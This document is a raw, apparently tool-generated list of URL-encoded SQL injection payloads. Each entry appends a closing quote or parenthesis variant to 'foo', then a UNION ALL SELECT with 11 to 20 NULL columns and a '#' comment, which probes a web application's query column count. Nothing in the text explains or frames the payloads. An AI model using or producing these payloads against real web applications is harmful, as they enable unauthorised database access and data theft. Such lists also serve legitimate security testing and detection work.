foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 